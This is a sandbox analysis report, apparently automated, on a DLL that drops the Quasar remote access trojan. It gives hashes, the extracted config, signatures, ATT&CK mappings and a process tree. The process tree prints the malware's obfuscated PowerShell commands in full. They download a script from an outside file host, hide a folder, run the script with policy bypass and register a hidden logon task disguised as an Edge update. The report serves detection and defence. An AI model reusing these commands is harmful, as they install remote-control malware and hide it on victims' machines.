quasar | bfa990bda3eebc658bcd0014dbfc9d57277e585548031f7ce4ecfcc8223f7b6b

Analysis

max time kernel
140s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20250410-en
resource tags

arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
submitted
19/04/2025, 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

msys-2.0.dll
Size

88KB
MD5

f947218a2b6bc294c22175030824c12b
SHA1

ba97c647a21d78f4d70135231574a9162998a3bf
SHA256

940d104b54c78abc2ab4af8d88c0da0083dda6ddf63e92976d96fadcf46d35c4
SHA512

46cb9b32a5bc07fb55fded5e42bbc8362ba0106d19c4441a639a821cd612867f676017d525d167384c9595b506db2d7a6f2ac8fa2d2c7fe102ede7b6132cd6e5
SSDEEP

1536:gsssTDMfCgjgibbqJ7tJ2Lr/lWzv0EH80OrxECICtf1eL5eim:hsOo6yOJRJ2X/czv0EH80OrxE9Ctf1eC

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

��:a>՘�后��s��6�F�l濺�,@ 3&�

Attributes

encryption_key
0A2600918F5E13281DD3F3E3CF35CA2FEACB6884
reconnect_delay
3000
startup_key
�� D��s�+��\� r8t$�

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral7/memory/4004-57-0x000001DBD8E20000-0x000001DBD8FAE000-memory.dmp	family_quasar

Blocklisted process makes network request 4 IoCs

flow	pid	Process
20	3524	powershell.exe
61	4004	powershell.exe
64	4004	powershell.exe
66	4004	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1240	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4004	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1240	powershell.exe
1240	powershell.exe
3524	powershell.exe
3524	powershell.exe
4004	powershell.exe
4004	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4580	rundll32.exe
Token: SeBackupPrivilege	4580	rundll32.exe
Token: SeDebugPrivilege	4580	rundll32.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeIncreaseQuotaPrivilege	1240	powershell.exe
Token: SeSecurityPrivilege	1240	powershell.exe
Token: SeTakeOwnershipPrivilege	1240	powershell.exe
Token: SeLoadDriverPrivilege	1240	powershell.exe
Token: SeSystemProfilePrivilege	1240	powershell.exe
Token: SeSystemtimePrivilege	1240	powershell.exe
Token: SeProfSingleProcessPrivilege	1240	powershell.exe
Token: SeIncBasePriorityPrivilege	1240	powershell.exe
Token: SeCreatePagefilePrivilege	1240	powershell.exe
Token: SeBackupPrivilege	1240	powershell.exe
Token: SeRestorePrivilege	1240	powershell.exe
Token: SeShutdownPrivilege	1240	powershell.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeSystemEnvironmentPrivilege	1240	powershell.exe
Token: SeRemoteShutdownPrivilege	1240	powershell.exe
Token: SeUndockPrivilege	1240	powershell.exe
Token: SeManageVolumePrivilege	1240	powershell.exe
Token: 33	1240	powershell.exe
Token: 34	1240	powershell.exe
Token: 35	1240	powershell.exe
Token: 36	1240	powershell.exe
Token: SeIncreaseQuotaPrivilege	1240	powershell.exe
Token: SeSecurityPrivilege	1240	powershell.exe
Token: SeTakeOwnershipPrivilege	1240	powershell.exe
Token: SeLoadDriverPrivilege	1240	powershell.exe
Token: SeSystemProfilePrivilege	1240	powershell.exe
Token: SeSystemtimePrivilege	1240	powershell.exe
Token: SeProfSingleProcessPrivilege	1240	powershell.exe
Token: SeIncBasePriorityPrivilege	1240	powershell.exe
Token: SeCreatePagefilePrivilege	1240	powershell.exe
Token: SeBackupPrivilege	1240	powershell.exe
Token: SeRestorePrivilege	1240	powershell.exe
Token: SeShutdownPrivilege	1240	powershell.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeSystemEnvironmentPrivilege	1240	powershell.exe
Token: SeRemoteShutdownPrivilege	1240	powershell.exe
Token: SeUndockPrivilege	1240	powershell.exe
Token: SeManageVolumePrivilege	1240	powershell.exe
Token: 33	1240	powershell.exe
Token: 34	1240	powershell.exe
Token: 35	1240	powershell.exe
Token: 36	1240	powershell.exe
Token: SeIncreaseQuotaPrivilege	1240	powershell.exe
Token: SeSecurityPrivilege	1240	powershell.exe
Token: SeTakeOwnershipPrivilege	1240	powershell.exe
Token: SeLoadDriverPrivilege	1240	powershell.exe
Token: SeSystemProfilePrivilege	1240	powershell.exe
Token: SeSystemtimePrivilege	1240	powershell.exe
Token: SeProfSingleProcessPrivilege	1240	powershell.exe
Token: SeIncBasePriorityPrivilege	1240	powershell.exe
Token: SeCreatePagefilePrivilege	1240	powershell.exe
Token: SeBackupPrivilege	1240	powershell.exe
Token: SeRestorePrivilege	1240	powershell.exe
Token: SeShutdownPrivilege	1240	powershell.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeSystemEnvironmentPrivilege	1240	powershell.exe
Token: SeRemoteShutdownPrivilege	1240	powershell.exe
Token: SeUndockPrivilege	1240	powershell.exe
Token: SeManageVolumePrivilege	1240	powershell.exe
Token: 33	1240	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4004	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 4580 wrote to memory of 5016	4580	rundll32.exe	87
PID 4580 wrote to memory of 5016	4580	rundll32.exe	87
PID 5016 wrote to memory of 2628	5016	cmd.exe	89
PID 5016 wrote to memory of 2628	5016	cmd.exe	89
PID 2628 wrote to memory of 4312	2628	winAPI.dll	92
PID 2628 wrote to memory of 4312	2628	winAPI.dll	92
PID 4312 wrote to memory of 2992	4312	cmd.exe	93
PID 4312 wrote to memory of 2992	4312	cmd.exe	93
PID 2992 wrote to memory of 1848	2992	cmd.exe	94
PID 2992 wrote to memory of 1848	2992	cmd.exe	94
PID 2992 wrote to memory of 1240	2992	cmd.exe	95
PID 2992 wrote to memory of 1240	2992	cmd.exe	95
PID 2992 wrote to memory of 3524	2992	cmd.exe	97
PID 2992 wrote to memory of 3524	2992	cmd.exe	97
PID 2992 wrote to memory of 4004	2992	cmd.exe	104
PID 2992 wrote to memory of 4004	2992	cmd.exe	104
PID 4004 wrote to memory of 556	4004	powershell.exe	110
PID 4004 wrote to memory of 556	4004	powershell.exe	110
PID 556 wrote to memory of 8	556	csc.exe	111
PID 556 wrote to memory of 8	556	csc.exe	111

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1848	attrib.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\msys-2.0.dll,#1
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c winAPI.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5016
- - C:\Users\Admin\AppData\Local\Temp\winAPI.dll
    winAPI.dll
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4312
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2992
      - C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache"
        6⤵
        Views/modifies file attributes
        
        PID:1848
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Execu"t"ionPolic"y" Byp"a"ss -Windo"w"Style Hid"d"en -Com"m"and "$action = New-ScheduledT"a"skAction -Execute 'powershell.exe' -Argument '-NoProfile -Exe"c"utionPo"l"icy B"y"pass -Wind"o"wStyle Hidden -File \"C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1\"'; $trigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME; $settings = New-ScheduledTaskSettingsSet -Hidden -DontStopIfGoingOnBatteries; $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; Register-ScheduledTask -TaskName 'Micro"s"oftEdge"U"pdat"e"Task' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force | Out-Null"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1240
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Exe"c"utionPol"i"cy By"p"ass -Win"d"owStyle H"i"dd"e"n -Co"m"mand "Invo"k"e-W"e"bRequ"e"st 'ht"t"ps://"f"iles."c"atbo"x".moe/92nbzf.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1' -Use"B"asicParsing"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:3524
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -N"o"Profi"l"e -Execu"t"ionPol"i"cy Bypa"s"s -WindowSt"y"le Hi"d"den -Fi"l"e "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4004
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k521gi3y\k521gi3y.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:556
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3592.tmp" "c:\Users\Admin\AppData\Local\Temp\k521gi3y\CSC7D2A6ACDC54842558AAD1C33B682671.TMP"
        8⤵
        
        PID:8

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1bca2b2500f9ecb2d3b3fea437cbfbf8

SHA1
f3c82ff727e0e206ed69bf4e338c396749357695

SHA256
9d69b6c8f0045d133d5d970ceb4386da2e0997c24fe75f14abb0811ecc2bfec5

SHA512
86f9215d605608601f0e8da94e397c072cca68e5aa6d2d2d697c1093f2d6df65c5c9164101e3b8bac939351516028fd90a88795ebed220508c4ac0f6d89e0b96

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b50729b9ad958b7495f38068b476b1e6

SHA1
c822998b2afb203f6951a3f507e51ad361697139

SHA256
e76f633bfb32430bb1e2370a5f33a25d184d1f26fca24ab00410bde354976251

SHA512
b9edea632b29caba5d9eec245574b7b9b934d0c14f619ebe0bd61bd404901b098e485259ac6d70430d67d6a21a6869c25e52b254ab88ccb551ba4166819092ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
1KB

MD5
56ed4e1fbde1df51fb37b6677265ec3d

SHA1
6dc4cf3ebe6c0043c6fca9b5c9c46a3f5a492d17

SHA256
d65e44cd5593e4f8d380c23516e94db3b18e9a5c42ef40697beb2a611aaa9204

SHA512
c9c037b3713d2774301a4d68beee7c528fd2ade5aac95f06c82b1ef9f23ba47ec316cfc0d711fd773c8c81fd33366537395daee361325c5465cf02eb6dae41c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3592.tmp

Filesize
1KB

MD5
ac87659a2ec974e77694385ad87f4dd2

SHA1
254500dcdf35c192a9fba93dc94114a3ff4b84da

SHA256
2f600cdd17e35bf7c57f39f6ebb1c85eb957e5ec5f56d1fc1e5afa7f3eb45970

SHA512
746808a53397cadc6a719bea44b0a0032c8d2f4f62124ef21923bf20588cade22fe465a60d6a1168b8f722ff90f835a8ff4a7a6ca0014d78013cdbaea5be77e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bacwjdlj.xbd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\k521gi3y\k521gi3y.dll

Filesize
3KB

MD5
07cd961891ae179d2cd8f4ae5cf86d0c

SHA1
981448abd9e087653880424fa2aeba12ac040e77

SHA256
4e9f8d67b019acbf9b55737c611f711408c5c2c38710020ef68c9ec33f5f91b2

SHA512
d2cef2590749217c573fd8b2fee6e071c60b25d7f36dc7a76cfbd4ce3b8a2ae5c9cf66adc24ce173eb426649cddb9eebba7786524200dfb39b8770ac2f02b812

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\UDCache\task.ps1

Filesize
7.0MB

MD5
f46cd513598c2b1ffb63fe501301dd64

SHA1
d1d71cfdc9ea551470478b2452d0e451b8d055e8

SHA256
e8d38cba909fb2374dc0a406fcc0c4360ffb12ba5d588856690e7e06657e6df5

SHA512
bbd43f0f9b7eddc0857ac14339859e0e6b756de8749e54795d86bcdb580d6bf369a5a4050231bf1bdb361ff817907175180f04f352df2e35fce63fbeb4f91974

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\k521gi3y\CSC7D2A6ACDC54842558AAD1C33B682671.TMP

Filesize
652B

MD5
e06547554b59d0a127a35b5e4928e4a3

SHA1
7d641ae58d0803695c5d6514b7c1b9b266d6cc21

SHA256
399cf15e6dce6af1fae27ed68f66ef5e129bbcc365727643ac594a24a1b3b2c5

SHA512
8f49f9929356463422ef1292d681e4cd1a8aa643512e1735b2f3f987490cd7378dfb140d55ea3b53d5cf5af6e1cf6f4a5b04cd56a3873bf45f73563fdd70160f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\k521gi3y\k521gi3y.0.cs

Filesize
938B

MD5
5b328f64341f326554c2d3c08ace5f93

SHA1
25a9aad6022782e5200d410aa9ff8e707ee2eb1a

SHA256
6e7a0c2174ae7882e6bd3f4afdf0438b982649021048df980b08c5ac948a01b9

SHA512
d4116697a54bc21a8d77aaa8eeafa95d60b6873073f2294d027829a83dc82bf39d63f08464b7622dcfd4ec3a1991b6225f72399321a5f93582d84387088badd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\k521gi3y\k521gi3y.cmdline

Filesize
369B

MD5
495671d088d6576641009e88ab1318d5

SHA1
4403b7646e4045958689de2d6494399b0c67326f

SHA256
f234ea803887cfb6ced7c0dc3d43b47238da79ca173ec817ba8d50353de11c85

SHA512
1c710dce2972449f0fdac65767a57fb2f65522e4939c64b14f8606584e2fa32f5b38fff3e0b87cd9f9f6a024ef38cd1cd37fd6e106a8bad1388e975559d483c7

Download Submit
memory/1240-5-0x000001F437940000-0x000001F437962000-memory.dmp

Filesize
136KB

Download
memory/4004-55-0x000001DBC05B0000-0x000001DBC071A000-memory.dmp

Filesize
1.4MB

Download
memory/4004-63-0x000001DBD93B0000-0x000001DBD93FE000-memory.dmp

Filesize
312KB

Download
memory/4004-53-0x000001DB95E70000-0x000001DB95E78000-memory.dmp

Filesize
32KB

Download
memory/4004-57-0x000001DBD8E20000-0x000001DBD8FAE000-memory.dmp

Filesize
1.6MB

Download
memory/4004-58-0x000001DBC0730000-0x000001DBC074A000-memory.dmp

Filesize
104KB

Download
memory/4004-60-0x000001DBD8DE0000-0x000001DBD8E1A000-memory.dmp

Filesize
232KB

Download
memory/4004-62-0x000001DBD9510000-0x000001DBD95C2000-memory.dmp

Filesize
712KB

Download
memory/4004-70-0x000001DBD9900000-0x000001DBD993C000-memory.dmp

Filesize
240KB

Download
memory/4004-61-0x000001DBD9400000-0x000001DBD9450000-memory.dmp

Filesize
320KB

Download
memory/4004-65-0x000001DBD94A0000-0x000001DBD94EA000-memory.dmp

Filesize
296KB

Download
memory/4004-66-0x000001DBD95D0000-0x000001DBD95FA000-memory.dmp

Filesize
168KB

Download
memory/4004-64-0x000001DBD9450000-0x000001DBD949C000-memory.dmp

Filesize
304KB

Download
memory/4004-59-0x000001DBD8DD0000-0x000001DBD8DE2000-memory.dmp

Filesize
72KB

Download
memory/4004-69-0x000001DBD98A0000-0x000001DBD98B2000-memory.dmp

Filesize
72KB

Download
memory/4580-0-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download